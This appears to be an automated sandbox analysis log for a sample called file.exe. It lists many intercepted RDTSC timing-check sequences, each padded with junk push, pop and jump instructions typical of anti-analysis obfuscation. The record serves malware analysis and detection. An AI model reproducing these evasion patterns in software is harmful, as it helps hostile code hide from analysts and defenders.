Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF98C1 second address: AF98C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF98C6 second address: AF990F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD4C8509C40h 0x0000000a jmp 00007FD4C8509C44h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD4C8509C47h 0x00000017 jp 00007FD4C8509C36h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A58B11 second address: A58B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF918B second address: AF9191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9191 second address: AF9195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AFBCD7 second address: AFBCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7013C second address: A70160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007FD4C8DA2152h 0x0000000b pop esi 0x0000000c jnl 00007FD4C8DA2152h 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B023B3 second address: B023C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FD4C8509C3Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B023C5 second address: B02405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD4C8DA2146h 0x0000000a popad 0x0000000b jmp 00007FD4C8DA214Bh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007FD4C8DA2151h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD4C8DA2154h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B00FA8 second address: B00FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C45h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B010FE second address: B01104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B01104 second address: B01138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD4C8509C49h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007FD4C8509C36h 0x0000001a js 00007FD4C8509C36h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B01436 second address: B0144C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB440D second address: AB4412 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB4412 second address: AB447D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FD4C8DA214Ch 0x0000000f jnl 00007FD4C8DA214Ch 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FD4C8DA2148h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 sub dword ptr [ebp+122D17E4h], esi 0x00000037 mov ebx, dword ptr [ebp+124954ADh] 0x0000003d add dword ptr [ebp+122D2772h], eax 0x00000043 add eax, ebx 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FD4C8DA2150h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB447D second address: AB44D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FD4C8509C42h 0x00000010 jns 00007FD4C8509C3Ch 0x00000016 nop 0x00000017 add dword ptr [ebp+122D2475h], ebx 0x0000001d push 00000004h 0x0000001f mov dword ptr [ebp+124568F6h], edx 0x00000025 nop 0x00000026 jmp 00007FD4C8509C49h 0x0000002b push eax 0x0000002c pushad 0x0000002d jnc 00007FD4C8509C38h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B015DB second address: B015FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA2155h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B015FA second address: B015FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B015FE second address: B01626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FD4C8DA215Dh 0x0000000e jmp 00007FD4C8DA2157h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07AA8 second address: B07AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FD4C8509C36h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07AB6 second address: B07ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07ABA second address: B07ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B06FF0 second address: B07028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8DA214Ah 0x00000009 jmp 00007FD4C8DA2158h 0x0000000e jmp 00007FD4C8DA214Ch 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07028 second address: B07039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FD4C8509C36h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07039 second address: B0706D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD4C8DA2146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD4C8DA2153h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FD4C8DA214Fh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0706D second address: B07071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071B3 second address: B071B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071B9 second address: B071CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FD4C8509C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071CA second address: B071CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071CE second address: B071EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD4C8509C41h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071EB second address: B071EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071EF second address: B071FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FD4C8509C36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B071FF second address: B0720F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0732B second address: B0732F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0AB2B second address: B0AB35 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD4C8DA214Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A2AA second address: B0A2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A2B5 second address: B0A2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A2B9 second address: B0A2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A2BD second address: B0A2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A5AB second address: B0A5AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A5AF second address: B0A5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0D87E second address: B0D88E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Bh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0D88E second address: B0D894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C64 second address: B13C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C68 second address: B13C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C6C second address: B13C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD4C8509C36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C78 second address: B13C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD4C8DA214Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13C8B second address: B13C9A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD4C8509C36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13FB6 second address: B13FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B13FBB second address: B13FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD4C8509C36h 0x0000000a jmp 00007FD4C8509C46h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1456F second address: B14579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD4C8DA2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14832 second address: B14851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8509C3Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007FD4C8509C3Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14851 second address: B14856 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19AF2 second address: B19AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19AF8 second address: B19B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD4C8DA2150h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD4C8DA214Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19B1A second address: B19B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19B1F second address: B19B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1CD34 second address: B1CD3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1CE70 second address: B1CE7A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD4C8DA214Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D290 second address: B1D294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D294 second address: B1D2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8DA2157h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D2B5 second address: B1D2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4C8509C40h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D2C9 second address: B1D2F5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD4C8DA2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jne 00007FD4C8DA216Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FD4C8DA2157h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D2F5 second address: B1D2F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23830 second address: B23860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA2153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4C8DA2150h 0x00000011 jno 00007FD4C8DA2146h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23D38 second address: B23D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23D3E second address: B23D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23E84 second address: B23EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 ja 00007FD4C8509C3Ah 0x0000000f pushad 0x00000010 jnp 00007FD4C8509C36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23EA0 second address: B23EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24308 second address: B24310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24310 second address: B24314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24314 second address: B24331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD4C8509C3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FD4C8509C36h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B244D2 second address: B244D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2467A second address: B2467F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25628 second address: B2562C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2562C second address: B25635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25635 second address: B2563B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2563B second address: B25647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B25647 second address: B2565C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD4C8DA2146h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007FD4C8DA2146h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B23386 second address: B233CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FD4C8509C3Eh 0x0000000a jmp 00007FD4C8509C46h 0x0000000f jmp 00007FD4C8509C49h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B233CD second address: B233D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B39A91 second address: B39AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FD4C8509C36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B39AA6 second address: B39AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA214Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B39AB7 second address: B39ABC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A646F8 second address: A64713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD4C8DA214Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD4C8DA2146h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3CDFE second address: B3CE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B3CE02 second address: B3CE0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4B2FF second address: B4B30C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D38B second address: B4D3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD4C8DA2146h 0x0000000a popad 0x0000000b pop edi 0x0000000c jl 00007FD4C8DA2187h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D3A1 second address: B4D3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D3A5 second address: B4D3CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4C8DA2152h 0x00000007 jmp 00007FD4C8DA214Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D3CD second address: B4D3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D263 second address: B4D274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD4C8DA2146h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4D274 second address: B4D27B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4EA4D second address: B4EA6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD4C8DA214Ch 0x0000000c pop eax 0x0000000d je 00007FD4C8DA2164h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56A95 second address: B56AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 jmp 00007FD4C8509C45h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
